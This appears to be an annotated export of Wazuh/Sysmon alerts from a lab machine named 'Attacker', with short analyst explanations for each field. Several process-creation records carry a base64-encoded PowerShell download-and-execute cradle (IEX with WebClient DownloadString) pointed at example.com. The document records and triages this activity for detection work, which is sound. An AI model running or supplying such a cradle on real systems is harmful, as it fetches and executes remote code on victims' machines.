No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd72-680a-860b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:50.439+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:50.439+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  81
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534330.1719617
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:48.4891010Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284883
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:48.448 ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} ProcessId: 16036 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_q0avipez.2ek.ps1 CreationUtcTime: 2025-04-24 22:38:48.445 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:48.448
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd76-680a-890b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_q0avipez.2ek.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:48.445
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:53.168+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:53.168+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  78
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534333.1722386
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:50.8815173Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284919
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:49.689 ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} ProcessId: 3688 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} ParentProcessId: 16036 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:49.689
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd79-680a-8b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd76-680a-890b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:53.185+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:53.185+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  82
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534333.1730453
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:51.0649204Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284920
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:51.047 ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} ProcessId: 3688 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gguk2unw.kfw.ps1 CreationUtcTime: 2025-04-24 22:38:51.047 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:51.047
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd79-680a-8b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gguk2unw.kfw.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:51.047
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:55.625+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:55.625+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  79
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534335.1733218
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:53.6335273Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284943
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:52.123 ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} ProcessId: 14828 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} ParentProcessId: 3688 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:52.123
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7c-680a-8d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

